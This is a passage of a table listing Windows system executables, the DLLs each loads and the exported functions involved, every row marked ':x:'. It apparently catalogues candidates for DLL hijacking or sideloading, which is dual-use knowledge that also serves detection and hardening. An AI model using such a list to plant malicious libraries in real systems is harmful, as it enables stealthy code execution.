| mdmdiagnosticstool.exe | WINHTTP.dll | DllMain | :x: |
| mdmdiagnosticstool.exe | WININET.dll | DllMain | :x: |
| mdmdiagnosticstool.exe | XmlLite.dll | DllMain | :x: |
| mfpmp.exe | CRYPTBASE.DLL | DllMain | :x: |
| mfpmp.exe | ksuser.dll | DllMain | :x: |
| mfpmp.exe | MFCORE.dll | DllMain | :x: |
| mfpmp.exe | MFPlat.DLL | DllMain | :x: |
| mfpmp.exe | MFPlat.DLL | MFGetCallStackTracingWeakReference | :x: |
| mfpmp.exe | MFPlat.DLL | MFShutdown | :x: |
| mfpmp.exe | RTWorkQ.DLL | DllMain | :x: |
| mfpmp.exe | RTWorkQ.DLL | RtwqRegisterPlatformEvents | :x: |
| mfpmp.exe | RTWorkQ.DLL | RtwqShutdown | :x: |
| microsoft.uev.cscunpintool.exe | CSCAPI.dll | DllMain | :x: |
| microsoft.uev.cscunpintool.exe | CSCAPI.dll | OfflineFilesQueryStatus | :x: |
| microsoftedgebchost.exe | iertutil.dll | DllMain | :x: |
| microsoftedgebchost.exe | USERENV.dll | DllMain | :x: |
| microsoftedgecp.exe | iertutil.dll | DllMain | :x: |
| microsoftedgecp.exe | USERENV.dll | DllMain | :x: |
| microsoftedgedevtools.exe | iertutil.dll | DllMain | :x: |
| microsoftedgesh.exe | USERENV.dll | DllMain | :x: |
| microsoftedgesh.exe | USERENV.dll | GetAppContainerRegistryLocation | :x: |
| mobsync.exe | edputil.dll | DllMain | :x: |
| mobsync.exe | edputil.dll | EdpGetIsManaged | :x: |
| mobsync.exe | PROPSYS.dll | DllMain | :x: |
| mobsync.exe | PROPSYS.dll | PSGetNameFromPropertyKey | :x: |
| mobsync.exe | PROPSYS.dll | PSStringFromPropertyKey | :x: |
| mobsync.exe | PROPSYS.dll | VariantToString | :x: |
| mousocoreworker.exe | winsqlite3.dll | DllMain | :x: |
| msdt.exe | ATL.DLL | DllMain | :x: |
| msdt.exe | Cabinet.dll | DllMain | :x: |
| msdt.exe | SSPICLI.DLL | DllMain | :x: |
| msdt.exe | SSPICLI.DLL | GetUserNameExW | :x: |
| msdt.exe | UxTheme.dll | DllMain | :x: |
| msdt.exe | wer.dll | DllMain | :x: |
| msdt.exe | WINHTTP.dll | DllMain | :x: |
| msdtc.exe | CLUSAPI.dll | DllMain | :x: |
| msdtc.exe | DNSAPI.dll | DllMain | :x: |
| msdtc.exe | ktmw32.dll | DllMain | :x: |
| msdtc.exe | MSDTCTM.dll | DllMain | :x: |
| msdtc.exe | MSDTCTM.dll | DtcMainExt | :x: |
| msdtc.exe | MTXCLU.DLL | DllMain | :x: |
| msdtc.exe | RESUTILS.dll | DllMain | :x: |
| msdtc.exe | XOLEHLP.dll | DllMain | :x: |
| msg.exe | WINSTA.dll | DllMain | :x: |
| mshta.exe | CRYPTBASE.DLL | DllMain | :x: |
| mshta.exe | netutils.dll | DllMain | :x: |
| mshta.exe | srpapi.dll | DllMain | :x: |
| mshta.exe | srpapi.dll | SrpGetEnterpriseIds | :x: |
| mshta.exe | SspiCli.dll | DllMain | :x: |
| mshta.exe | SspiCli.dll | GetUserNameExW | :x: |
| mshta.exe | WINHTTP.dll | DllMain | :x: |
| mshta.exe | wkscli.dll | DllMain | :x: |
| mshta.exe | WLDP.DLL | DllMain | :x: |
| mshta.exe | WLDP.DLL | WldpGetLockdownPolicy | :x: |
| msiexec.exe | msi.dll | DllMain | :x: |
| msiexec.exe | msi.dll | MsiLoadStringW | :x: |
| msiexec.exe | msi.dll | MsiMessageBoxExW | :x: |
| msinfo32.exe | ATL.DLL | DllMain | :x: |
| msinfo32.exe | SLC.dll | DllMain | :x: |
| msinfo32.exe | sppc.dll | DllMain | :x: |
| mspaint.exe | MSFTEDIT.DLL | DllMain | :x: |
| mspaint.exe | PROPSYS.dll | DllMain | :x: |
| msra.exe | IPHLPAPI.DLL | DllMain | :x: |
| msra.exe | IPHLPAPI.DLL | GetAdaptersAddresses | :x: |
| msra.exe | IPHLPAPI.DLL | NotifyUnicastIpAddressChange | :x: |
| msra.exe | NDFAPI.DLL | DllMain | :x: |
| msra.exe | SspiCli.dll | DllMain | :x: |
| msra.exe | SspiCli.dll | GetUserNameExA | :x: |
| msra.exe | SspiCli.dll | GetUserNameExW | :x: |
| msra.exe | USERENV.dll | DllMain | :x: |
| msra.exe | USERENV.dll | GetProfileType | :x: |
| msra.exe | UxTheme.dll | DllMain | :x: |
| msra.exe | UxTheme.dll | IsAppThemed | :x: |
| msra.exe | UxTheme.dll | IsThemeActive | :x: |
| msra.exe | UxTheme.dll | OpenThemeData | :x: |
| msra.exe | wdi.dll | DllMain | :x: |
| mstsc.exe | credui.dll | DllMain | :x: |
| mstsc.exe | CRYPTBASE.DLL | DllMain | :x: |
| mstsc.exe | CRYPTUI.dll | DllMain | :x: |
| mstsc.exe | IPHLPAPI.DLL | DllMain | :x: |
| mstsc.exe | ktmw32.dll | DllMain | :x: |
| mstsc.exe | NETUTILS.DLL | DllMain | :x: |
| mstsc.exe | SSPICLI.DLL | DllMain | :x: |
| mstsc.exe | WINHTTP.dll | DllMain | :x: |
| mstsc.exe | WININET.dll | DllMain | :x: |
| mstsc.exe | WKSCLI.DLL | DllMain | :x: |
| mtstocom.exe | SspiCli.dll | DllMain | :x: |
| muiunattend.exe | dbgcore.DLL | DllMain | :x: |
| muiunattend.exe | SspiCli.dll | DllMain | :x: |
| muiunattend.exe | wdscore.dll | ConstructPartialMsgVW | :x: |
| muiunattend.exe | wdscore.dll | CurrentIP | :x: |
| muiunattend.exe | wdscore.dll | DllMain | :x: |
| muiunattend.exe | wdscore.dll | WdsSetupLogInit | :x: |
| muiunattend.exe | wdscore.dll | WdsSetupLogMessageW | :x: |
| musnotification.exe | Cabinet.dll | DllMain | :x: |
| musnotification.exe | UpdatePolicy.dll | DllMain | :x: |
| musnotification.exe | UPShared.dll | DllMain | :x: |
| musnotification.exe | USERENV.dll | DllMain | :x: |
| musnotification.exe | WINHTTP.dll | DllMain | :x: |
| musnotification.exe | WINSTA.dll | DllMain | :x: |
| musnotification.exe | WINSTA.dll | WinStationEnumerateW | :x: |
| musnotificationux.exe | Cabinet.dll | DllMain | :x: |
| musnotificationux.exe | DMCmnUtils.dll | DllMain | :x: |
| musnotificationux.exe | UpdatePolicy.dll | DllMain | :x: |
| musnotificationux.exe | UPShared.dll | DllMain | :x: |
| musnotificationux.exe | WINHTTP.dll | DllMain | :x: |
| musnotificationux.exe | XmlLite.dll | DllMain | :x: |
| musnotifyicon.exe | DMCmnUtils.dll | DllMain | :x: |
| musnotifyicon.exe | UPShared.dll | DllMain | :x: |
| musnotifyicon.exe | WINHTTP.dll | DllMain | :x: |
| musnotifyicon.exe | XmlLite.dll | DllMain | :x: |
| nbtstat.exe | IPHLPAPI.DLL | DllMain | :x: |
| net.exe | IPHLPAPI.DLL | DllMain | :x: |
| net.exe | netutils.dll | DllMain | :x: |
| net.exe | netutils.dll | NetApiBufferAllocate | :x: |
| net.exe | samcli.dll | DllMain | :x: |
| net.exe | srvcli.dll | DllMain | :x: |
| net.exe | wkscli.dll | DllMain | :x: |
| net1.exe | CRYPTBASE.dll | DllMain | :x: |
| net1.exe | DSROLE.dll | DllMain | :x: |
| net1.exe | logoncli.dll | DllMain | :x: |
| net1.exe | netutils.dll | DllMain | :x: |
| net1.exe | netutils.dll | NetApiBufferAllocate | :x: |
| net1.exe | samcli.dll | DllMain | :x: |
| net1.exe | srvcli.dll | DllMain | :x: |
| net1.exe | wkscli.dll | DllMain | :x: |
| netbtugc.exe | dbgcore.DLL | DllMain | :x: |
| netbtugc.exe | IPHLPAPI.DLL | DllMain | :x: |
| netbtugc.exe | wdscore.dll | ConstructPartialMsgVA | :x: |
| netbtugc.exe | wdscore.dll | CurrentIP | :x: |
| netbtugc.exe | wdscore.dll | DllMain | :x: |
| netbtugc.exe | wdscore.dll | WdsSetupLogDestroy | :x: |
| netbtugc.exe | wdscore.dll | WdsSetupLogInit | :x: |
| netbtugc.exe | wdscore.dll | WdsSetupLogMessageA | :x: |
| nethost.exe | RASAPI32.dll | DllMain | :x: |
| nethost.exe | RASAPI32.dll | RasConfigUserProxySettingsW | :x: |
| nethost.exe | rasman.dll | DllMain | :x: |
| nethost.exe | rtutils.dll | DllMain | :x: |
| nethost.exe | rtutils.dll | TraceRegisterExA | :x: |
| netiougc.exe | dbgcore.DLL | DllMain | :x: |
| netiougc.exe | dhcpcsvc.DLL | DllMain | :x: |
| netiougc.exe | IPHLPAPI.DLL | DllMain | :x: |
| netiougc.exe | wdscore.dll | ConstructPartialMsgVA | :x: |
| netiougc.exe | wdscore.dll | CurrentIP | :x: |
| netiougc.exe | wdscore.dll | DllMain | :x: |
| netiougc.exe | wdscore.dll | WdsSetupLogDestroy | :x: |
| netiougc.exe | wdscore.dll | WdsSetupLogInit | :x: |
| netiougc.exe | wdscore.dll | WdsSetupLogMessageA | :x: |
| netsh.exe | adsldpc.dll | DllMain | :x: |
| netsh.exe | AUTHFWCFG.DLL | DllMain | :x: |
| netsh.exe | AUTHFWCFG.DLL | InitHelperDll | :x: |
| netsh.exe | Cabinet.dll | DllMain | :x: |
| netsh.exe | CRYPTBASE.DLL | DllMain | :x: |
| netsh.exe | DHCPCMONITOR.DLL | DllMain | :x: |
| netsh.exe | DHCPCMONITOR.DLL | InitHelperDll | :x: |
| netsh.exe | dhcpcsvc.DLL | DllMain | :x: |
| netsh.exe | dhcpcsvc6.DLL | DllMain | :x: |
| netsh.exe | DNSAPI.dll | DllMain | :x: |
| netsh.exe | dot3api.dll | DllMain | :x: |
| netsh.exe | DOT3CFG.DLL | DllMain | :x: |
| netsh.exe | DOT3CFG.DLL | InitHelperDll | :x: |
| netsh.exe | eappcfg.dll | DllMain | :x: |
| netsh.exe | eappprxy.dll | DllMain | :x: |
| netsh.exe | FirewallAPI.dll | DllMain | :x: |
| netsh.exe | FirewallAPI.dll | FwAlloc | :x: |
| netsh.exe | FirewallAPI.dll | FwFree | :x: |
| netsh.exe | fwbase.dll | DllMain | :x: |
| netsh.exe | fwbase.dll | FwAlloc | :x: |
| netsh.exe | fwbase.dll | FwBaseAlloc | :x: |
| netsh.exe | fwbase.dll | FwBaseFree | :x: |
| netsh.exe | fwbase.dll | FwCriticalSectionCreate | :x: |
| netsh.exe | fwbase.dll | FwReportErrorAsWinError | :x: |
| netsh.exe | FWCFG.DLL | DllMain | :x: |
| netsh.exe | FWCFG.DLL | InitHelperDll | :x: |
| netsh.exe | FWPolicyIOMgr.dll | DllMain | :x: |
| netsh.exe | fwpuclnt.dll | DllMain | :x: |
| netsh.exe | HNETMON.DLL | DllMain | :x: |
| netsh.exe | HNETMON.DLL | InitHelperDll | :x: |
| netsh.exe | HTTPAPI.dll | DllMain | :x: |
| netsh.exe | HTTPAPI.dll | HttpInitialize | :x: |
| netsh.exe | IFMON.DLL | DllMain | :x: |
| netsh.exe | IFMON.DLL | InitHelperDll | :x: |
| netsh.exe | IPHLPAPI.DLL | DllMain | :x: |
| netsh.exe | IPHLPAPI.DLL | GetDefaultCompartmentId | :x: |
| netsh.exe | ktmw32.dll | CreateTransaction | :x: |
| netsh.exe | ktmw32.dll | DllMain | :x: |
| netsh.exe | mintdh.dll | DllMain | :x: |
| netsh.exe | mintdh.dll | TdhpSetWbemExtensionBlock | :x: |
| netsh.exe | MobileNetworking.dll | DllMain | :x: |
| netsh.exe | NDFAPI.DLL | DllMain | :x: |
| netsh.exe | NETIOHLP.DLL | DllMain | :x: |
| netsh.exe | NETIOHLP.DLL | InitHelperDll | :x: |
| netsh.exe | netshell.dll | DllMain | :x: |
| netsh.exe | NETTRACE.DLL | DllMain | :x: |
| netsh.exe | NETTRACE.DLL | InitHelperDll | :x: |
| netsh.exe | nlaapi.dll | DllMain | :x: |
| netsh.exe | NSHHTTP.DLL | DllMain | :x: |
| netsh.exe | NSHHTTP.DLL | InitHelperDll | :x: |
| netsh.exe | NSHIPSEC.DLL | DllMain | :x: |
| netsh.exe | NSHIPSEC.DLL | InitHelperDll | :x: |
| netsh.exe | NSHWFP.DLL | DllMain | :x: |
| netsh.exe | NSHWFP.DLL | InitHelperDll | :x: |
| netsh.exe | OneX.DLL | DllMain | :x: |
| netsh.exe | P2P.dll | DllMain | :x: |
| netsh.exe | P2PNETSH.DLL | DllMain | :x: |
| netsh.exe | P2PNETSH.DLL | InitHelperDll | :x: |
| netsh.exe | PEERDISTSH.DLL | DllMain | :x: |
| netsh.exe | PEERDISTSH.DLL | InitHelperDll | :x: |
| netsh.exe | POLSTORE.DLL | DllMain | :x: |
| netsh.exe | POLSTORE.DLL | IPSecOpenPolicyStore | :x: |
| netsh.exe | RASAPI32.dll | DllMain | :x: |
| netsh.exe | rasman.dll | DllMain | :x: |
| netsh.exe | RASMONTR.DLL | DllMain | :x: |
| netsh.exe | RASMONTR.DLL | InitHelperDll | :x: |
| netsh.exe | RMCLIENT.dll | DllMain | :x: |
| netsh.exe | RPCNSH.DLL | DllMain | :x: |
| netsh.exe | RPCNSH.DLL | InitHelperDll | :x: |
| netsh.exe | SLC.dll | DllMain | :x: |
| netsh.exe | SLC.dll | SLRegisterWindowsEvent | :x: |
| netsh.exe | sppc.dll | DllMain | :x: |
| netsh.exe | sppc.dll | SLRegisterEvent | :x: |
| netsh.exe | SspiCli.dll | DllMain | :x: |
| netsh.exe | USERENV.dll | DllMain | :x: |
| netsh.exe | USERENV.dll | RegisterGPNotification | :x: |
| netsh.exe | wcmapi.dll | DllMain | :x: |
| netsh.exe | WCNNETSH.DLL | DllMain | :x: |
| netsh.exe | WCNNETSH.DLL | InitHelperDll | :x: |
| netsh.exe | wdi.dll | DllMain | :x: |
| netsh.exe | wevtapi.dll | DllMain | :x: |
| netsh.exe | WHHELPER.DLL | DllMain | :x: |
| netsh.exe | WHHELPER.DLL | InitHelperDll | :x: |
| netsh.exe | WINHTTP.dll | DllMain | :x: |
| netsh.exe | WINIPSEC.DLL | DllMain | :x: |
| netsh.exe | WINNSI.DLL | DllMain | :x: |
| netsh.exe | wlanapi.dll | DllMain | :x: |
| netsh.exe | WLANCFG.DLL | DllMain | :x: |
| netsh.exe | WLANCFG.DLL | InitHelperDll | :x: |
| netsh.exe | WSHELPER.DLL | DllMain | :x: |
| netsh.exe | WSHELPER.DLL | InitHelperDll | :x: |
| netsh.exe | WWANCFG.DLL | DllMain | :x: |
| netsh.exe | WWANCFG.DLL | InitHelperDll | :x: |
| netsh.exe | wwapi.dll | DllMain | :x: |
| netstat.exe | IPHLPAPI.DLL | DllMain | :x: |
| netstat.exe | IPHLPAPI.DLL | InternalGetIfTable | :x: |
| netstat.exe | IPHLPAPI.DLL | InternalGetTcpTable2 | :x: |
| netstat.exe | snmpapi.dll | DllMain | :x: |
| netstat.exe | snmpapi.dll | SnmpTfxOpen | :x: |
| ngciso.exe | iumbase.DLL | DllMain | :x: |
| nltest.exe | logoncli.dll | DllMain | :x: |
| nltest.exe | netutils.dll | DllMain | :x: |
| nltest.exe | NTDSAPI.dll | DllMain | :x: |
| nslookup.exe | DNSAPI.dll | DllMain | :x: |
| nslookup.exe | DNSAPI.dll | DnsQueryConfigAllocEx | :x: |
| omadmclient.exe | DEVOBJ.dll | DllMain | :x: |
| omadmclient.exe | DMCfgUtils.dll | DllMain | :x: |
| omadmclient.exe | DMCmnUtils.dll | DllMain | :x: |
| omadmclient.exe | dmEnrollEngine.DLL | DllMain | :x: |
| omadmclient.exe | dmenterprisediagnostics.dll | DllMain | :x: |
| omadmclient.exe | dmiso8601utils.dll | DllMain | :x: |
| omadmclient.exe | DMOleAutUtils.dll | DllMain | :x: |
| omadmclient.exe | dmxmlhelputils.dll | DllMain | :x: |
| omadmclient.exe | IPHLPAPI.DLL | DllMain | :x: |
| omadmclient.exe | iri.dll | DllMain | :x: |
| omadmclient.exe | omadmapi.dll | DllMain | :x: |
| omadmclient.exe | omadmapi.dll | FreeCommandLineOptions | :x: |
| omadmclient.exe | omadmapi.dll | OmaDmGetInternalAcctID | :x: |
| omadmclient.exe | omadmapi.dll | ProcessCommandLine | :x: |
| omadmclient.exe | policymanager.dll | DllMain | :x: |
| omadmclient.exe | USERENV.dll | DllMain | :x: |
| omadmclient.exe | XmlLite.dll | DllMain | :x: |
| openfiles.exe | netutils.dll | DllMain | :x: |
| openfiles.exe | srvcli.dll | DllMain | :x: |
| openfiles.exe | SspiCli.dll | DllMain | :x: |
| osk.exe | AUDIOSES.DLL | DllMain | :x: |
| osk.exe | AVRT.dll | DllMain | :x: |
| osk.exe | DEVOBJ.dll | DevObjCreateDeviceInfoList | :x: |
| osk.exe | DEVOBJ.dll | DllMain | :x: |
| osk.exe | dwmapi.dll | DllMain | :x: |
| osk.exe | dwmapi.dll | DwmIsCompositionEnabled | :x: |
| osk.exe | dwmapi.dll | DwmSetWindowAttribute | :x: |
| osk.exe | ksuser.dll | DllMain | :x: |
| osk.exe | midimap.dll | DllMain | :x: |
| osk.exe | midimap.dll | DriverProc | :x: |
| osk.exe | MMDevAPI.DLL | DllMain | :x: |
| osk.exe | MSACM32.dll | acmGetVersion | :x: |
| osk.exe | MSACM32.dll | DllMain | :x: |
| osk.exe | OLEACC.dll | AccessibleObjectFromWindowTimeout | :x: |
| osk.exe | OLEACC.dll | AccSetRunningUtilityState | :x: |
| osk.exe | OLEACC.dll | DllMain | :x: |
| osk.exe | OLEACC.dll | GetProcessHandleFromHwnd | :x: |
| osk.exe | OskSupport.dll | DllMain | :x: |
| osk.exe | OskSupport.dll | InitializeOSKSupport | :x: |
| osk.exe | OskSupport.dll | UninitializeOSKSupport | :x: |
| osk.exe | WindowsCodecs.dll | DllMain | :x: |
| osk.exe | WindowsCodecs.dll | WICCreateImagingFactory_Proxy | :x: |
| osk.exe | WMsgAPI.dll | DllMain | :x: |
| pacjsworker.exe | WINHTTP.dll | DllMain | :x: |
| packageinspector.exe | msi.dll | DllMain | :x: |
| packageinspector.exe | SLC.dll | DllMain | :x: |
| packageinspector.exe | SLC.dll | SLGetWindowsInformationDWORD | :x: |
| packageinspector.exe | sppc.dll | DllMain | :x: |
| packageinspector.exe | wevtapi.dll | DllMain | :x: |
| pathping.exe | IPHLPAPI.DLL | DllMain | :x: |
| pcalua.exe | pcaui.dll | DllMain | :x: |
| pcalua.exe | wer.dll | DllMain | :x: |
| pinenrollmentbroker.exe | PROPSYS.dll | DllMain | :x: |
| pinenrollmentbroker.exe | SspiCli.dll | DllMain | :x: |
| pktmon.exe | mintdh.dll | DllMain | :x: |
| pktmon.exe | mintdh.dll | TdhpSetWbemExtensionBlock | :x: |
| plasrv.exe | Cabinet.dll | DllMain | :x: |
| plasrv.exe | mintdh.dll | DllMain | :x: |
| plasrv.exe | mintdh.dll | TdhpSetWbemExtensionBlock | :x: |
| plasrv.exe | pdh.dll | DllMain | :x: |
| plasrv.exe | tdh.dll | DllMain | :x: |
| plasrv.exe | wevtapi.dll | DllMain | :x: |
| pnpunattend.exe | dbgcore.DLL | DllMain | :x: |
| pnpunattend.exe | DEVRTL.dll | DllMain | :x: |
| pnpunattend.exe | newdev.dll | DllMain | :x: |
| pnpunattend.exe | wdscore.dll | ConstructPartialMsgVW | :x: |
| pnpunattend.exe | wdscore.dll | CurrentIP | :x: |
| pnpunattend.exe | wdscore.dll | DllMain | :x: |
| pnpunattend.exe | wdscore.dll | WdsSetupLogDestroy | :x: |
| pnpunattend.exe | wdscore.dll | WdsSetupLogInit | :x: |
| pnpunattend.exe | wdscore.dll | WdsSetupLogMessageW | :x: |
| presentationhost.exe | CRYPTBASE.DLL | DllMain | :x: |
| presentationhost.exe | mscoree.dll | CorExitProcess | :x: |
| presentationhost.exe | mscoree.dll | DllMain | :x: |
| presentationhost.exe | WININET.dll | DllMain | :x: |
| presentationsettings.exe | SspiCli.dll | DllMain | :x: |
| presentationsettings.exe | SspiCli.dll | GetUserNameExW | :x: |
| printbrmui.exe | IPHLPAPI.DLL | DllMain | :x: |
| printbrmui.exe | PROPSYS.dll | DllMain | :x: |
| psr.exe | AEPIC.dll | DllMain | :x: |
| psr.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag | :x: |
| psr.exe | CLDAPI.dll | DllMain | :x: |
| psr.exe | FLTLIB.DLL | DllMain | :x: |
| psr.exe | HID.DLL | DllMain | :x: |
| psr.exe | msdrm.dll | DllMain | :x: |
| psr.exe | OLEACC.dll | DllMain | :x: |
| psr.exe | SspiCli.dll | DllMain | :x: |
| psr.exe | SspiCli.dll | GetUserNameExW | :x: |
| psr.exe | uireng.dll | DllMain | :x: |
| psr.exe | uireng.dll | UirInitializeEngine | :x: |
| psr.exe | XmlLite.dll | DllMain | :x: |
| query.exe | logoncli.dll | DllMain | :x: |
| query.exe | netutils.dll | DllMain | :x: |
| query.exe | REGAPI.dll | DllMain | :x: |
| query.exe | REGAPI.dll | RegQueryUtilityCommandList | :x: |
| query.exe | samcli.dll | DllMain | :x: |
| query.exe | srvcli.dll | DllMain | :x: |
| query.exe | utildll.dll | DllMain | :x: |
| query.exe | WINSTA.dll | DllMain | :x: |
| quickassist.exe | ATL.DLL | AtlComPtrAssign | :x: |
| quickassist.exe | ATL.DLL | DllMain | :x: |
| quickassist.exe | CRYPTBASE.DLL | DllMain | :x: |
| quickassist.exe | CRYPTBASE.DLL | SystemFunction036 | :x: |
| quickassist.exe | d2d1.dll | DllMain | :x: |
| quickassist.exe | d3d11.dll | DllMain | :x: |
| quickassist.exe | dcomp.dll | DllMain | :x: |
| quickassist.exe | dxgi.dll | DllMain | :x: |
| quickassist.exe | PROPSYS.dll | DllMain | :x: |
| quickassist.exe | PROPSYS.dll | VariantToStringWithDefault | :x: |
| quickassist.exe | SAS.dll | DllMain | :x: |
| quickassist.exe | SspiCli.dll | AcquireCredentialsHandleA | :x: |
| quickassist.exe | SspiCli.dll | DllMain | :x: |
| quickassist.exe | SspiCli.dll | GetUserNameExA | :x: |
| quickassist.exe | SspiCli.dll | GetUserNameExW | :x: |
| quickassist.exe | SspiCli.dll | InitializeSecurityContextA | :x: |
| quickassist.exe | SspiCli.dll | QueryContextAttributesExA | :x: |
| quickassist.exe | UxTheme.dll | DllMain | :x: |
| quickassist.exe | UxTheme.dll | SetWindowThemeAttribute | :x: |
| quickassist.exe | WindowsCodecs.dll | DllMain | :x: |
| quickassist.exe | WININET.dll | AppCacheGetGroupList | :x: |
| quickassist.exe | WININET.dll | DllMain | :x: |
| quickassist.exe | WININET.dll | InternetInitializeAutoProxyDll | :x: |
| quickassist.exe | WININET.dll | InternetOpenW | :x: |
| quickassist.exe | WININET.dll | InternetSetOptionW | :x: |
| quser.exe | logoncli.dll | DllMain | :x: |
| quser.exe | netutils.dll | DllMain | :x: |
| quser.exe | samcli.dll | DllMain | :x: |
| quser.exe | srvcli.dll | DllMain | :x: |
| quser.exe | UTILDLL.dll | DllMain | :x: |
| quser.exe | UTILDLL.dll | StrConnectState | :x: |
| quser.exe | WINSTA.dll | DllMain | :x: |
| quser.exe | WINSTA.dll | WinStationEnumerateW | :x: |
| qwinsta.exe | logoncli.dll | DllMain | :x: |
| qwinsta.exe | netutils.dll | DllMain | :x: |
| qwinsta.exe | samcli.dll | DllMain | :x: |
| qwinsta.exe | srvcli.dll | DllMain | :x: |
| qwinsta.exe | UTILDLL.dll | DllMain | :x: |
| qwinsta.exe | UTILDLL.dll | StrConnectState | :x: |
| qwinsta.exe | WINSTA.dll | DllMain | :x: |
| qwinsta.exe | WINSTA.dll | WinStationEnumerateW | :x: |
| rasautou.exe | MPRAPI.dll | DllMain | :x: |
| rasautou.exe | rasman.dll | DllMain | :x: |
| rasautou.exe | rtutils.dll | DllMain | :x: |
| rasdial.exe | RASAPI32.dll | DllMain | :x: |
| rasdial.exe | RASAPI32.dll | RasCompleteDialMachineCleanup | :x: |
| rasdial.exe | RASAPI32.dll | RasEnumConnectionsW | :x: |
| rasdial.exe | rasman.dll | DllMain | :x: |
| rasdial.exe | rasman.dll | RasConnectionEnum | :x: |
| rasdial.exe | rasman.dll | RasInitialize | :x: |
| rasdial.exe | rtutils.dll | DllMain | :x: |
| rasdial.exe | rtutils.dll | TracePrintfExA | :x: |
| rasdial.exe | rtutils.dll | TraceRegisterExA | :x: |
| raserver.exe | netutils.dll | DllMain | :x: |
| raserver.exe | samcli.dll | DllMain | :x: |
| raserver.exe | WTSAPI32.dll | DllMain | :x: |
| rdpclip.exe | CRYPTBASE.DLL | DllMain | :x: |
| rdpclip.exe | DEVOBJ.dll | DevObjCreateDeviceInfoList | :x: |
| rdpclip.exe | DEVOBJ.dll | DevObjDestroyDeviceInfoList | :x: |
| rdpclip.exe | DEVOBJ.dll | DevObjEnumDeviceInfo | :x: |
| rdpclip.exe | DEVOBJ.dll | DevObjEnumDeviceInterfaces | :x: |
| rdpclip.exe | DEVOBJ.dll | DevObjGetClassDevs | :x: |
| rdpclip.exe | DEVOBJ.dll | DevObjGetDeviceInfoListDetail | :x: |
| rdpclip.exe | DEVOBJ.dll | DevObjGetDeviceInterfaceDetail | :x: |
| rdpclip.exe | DEVOBJ.dll | DllMain | :x: |
| rdpclip.exe | dwmapi.dll | DllMain | :x: |
| rdpclip.exe | IPHLPAPI.DLL | DllMain | :x: |
| rdpclip.exe | PROPSYS.dll | DllMain | :x: |
| rdpclip.exe | srpapi.dll | DllMain | :x: |
| rdpclip.exe | WINSTA.dll | DllMain | :x: |
| rdpclip.exe | WINSTA.dll | WinStationNameFromLogonIdW | :x: |
| rdpclip.exe | WINSTA.dll | WinStationQueryInformationW | :x: |
| rdpclip.exe | WINSTA.dll | WinStationRegisterConsoleNotification | :x: |
| rdpclip.exe | WINSTA.dll | WinStationVirtualOpenEx | :x: |
| rdpclip.exe | WTSAPI32.dll | DllMain | :x: |
| rdpclip.exe | WTSAPI32.dll | WTSQuerySessionInformationW | :x: |
| rdpclip.exe | WTSAPI32.dll | WTSRegisterSessionNotification | :x: |
| rdpclip.exe | WTSAPI32.dll | WTSVirtualChannelOpen | :x: |
| rdpclip.exe | WTSAPI32.dll | WTSVirtualChannelOpenEx | :x: |
| rdpsa.exe | SspiCli.dll | DllMain | :x: |
| rdpsa.exe | WINSTA.dll | DllMain | :x: |
| rdpsauachelper.exe | WINSTA.dll | DllMain | :x: |
| rdpsauachelper.exe | WINSTA.dll | WinStationGetAllProcesses | :x: |
| rdpshell.exe | dwmapi.dll | DllMain | :x: |
| rdpshell.exe | WINSTA.dll | DllMain | :x: |
| rdpshell.exe | WINSTA.dll | WinStationGetConnectionProperty | :x: |
| rdpshell.exe | WTSAPI32.dll | DllMain | :x: |
| rdvghelper.exe | dwmapi.dll | DllMain | :x: |
| rdvghelper.exe | WINSTA.dll | DllMain | :x: |
| rdvghelper.exe | WINSTA.dll | WinStationRegisterConsoleNotification | :x: |
| rdvghelper.exe | WTSAPI32.dll | DllMain | :x: |
| rdvghelper.exe | WTSAPI32.dll | WTSRegisterSessionNotification | :x: |
| reagentc.exe | Cabinet.dll | DllMain | :x: |
| reagentc.exe | ReAgent.dll | DllMain | :x: |
| reagentc.exe | ReAgent.dll | WinReGetError | :x: |
| reagentc.exe | ReAgent.dll | WinReSetError | :x: |
| recover.exe | DEVOBJ.dll | DllMain | :x: |
| register-cimprovider.exe | miutils.dll | DllMain | :x: |
| register-cimprovider.exe | prvdmofcomp.dll | CreateRegisterParameter | :x: |
| register-cimprovider.exe | prvdmofcomp.dll | DllMain | :x: |
| rekeywiz.exe | credui.dll | DllMain | :x: |
| rekeywiz.exe | CRYPTBASE.DLL | DllMain | :x: |
| rekeywiz.exe | CRYPTUI.dll | DllMain | :x: |
| rekeywiz.exe | DSROLE.dll | DllMain | :x: |
| rekeywiz.exe | DSROLE.dll | DsRoleGetPrimaryDomainInformation | :x: |
| rekeywiz.exe | duser.dll | DllMain | :x: |
| rekeywiz.exe | EFSADU.dll | DllMain | :x: |
| rekeywiz.exe | EFSUTIL.dll | DllMain | :x: |
| rekeywiz.exe | EFSUTIL.dll | EfsUtilApplyGroupPolicy | :x: |
| rekeywiz.exe | FeClient.dll | DllMain | :x: |
| rekeywiz.exe | logoncli.dll | DllMain | :x: |
| rekeywiz.exe | netutils.dll | DllMain | :x: |
| rekeywiz.exe | USERENV.dll | DllMain | :x: |
| rekeywiz.exe | VAULTCLI.dll | DllMain | :x: |
| relog.exe | pdh.dll | DllMain | :x: |
| relpost.exe | Cabinet.dll | DllMain | :x: |
| relpost.exe | ReAgent.dll | DllMain | :x: |
| relpost.exe | wer.dll | DllMain | :x: |
| repair-bde.exe | BDEREPAIR.dll | DllMain | :x: |
| reset.exe | logoncli.dll | DllMain | :x: |
| reset.exe | netutils.dll | DllMain | :x: |
| reset.exe | REGAPI.dll | DllMain | :x: |
| reset.exe | REGAPI.dll | RegQueryUtilityCommandList | :x: |
| reset.exe | samcli.dll | DllMain | :x: |
| reset.exe | srvcli.dll | DllMain | :x: |
| reset.exe | utildll.dll | DllMain | :x: |
| reset.exe | WINSTA.dll | DllMain | :x: |
| resetengine.exe | bcd.dll | DllMain | :x: |
| resetengine.exe | Cabinet.dll | DllMain | :x: |
| resetengine.exe | DismApi.DLL | DllMain | :x: |
| resetengine.exe | FVEAPI.dll | DllMain | :x: |
| resetengine.exe | ReAgent.dll | DllMain | :x: |
| resetengine.exe | ResetEngine.dll | DllMain | :x: |
| resetengine.exe | tbs.dll | DllMain | :x: |
| resetengine.exe | VSSAPI.DLL | DllMain | :x: |
| resetengine.exe | VssTrace.DLL | DllMain | :x: |
| resetengine.exe | WDSCORE.dll | DllMain | :x: |
| resetengine.exe | WIMGAPI.DLL | DllMain | :x: |
| resetengine.exe | WINHTTP.dll | DllMain | :x: |
| resetengine.exe | WOFUTIL.dll | DllMain | :x: |
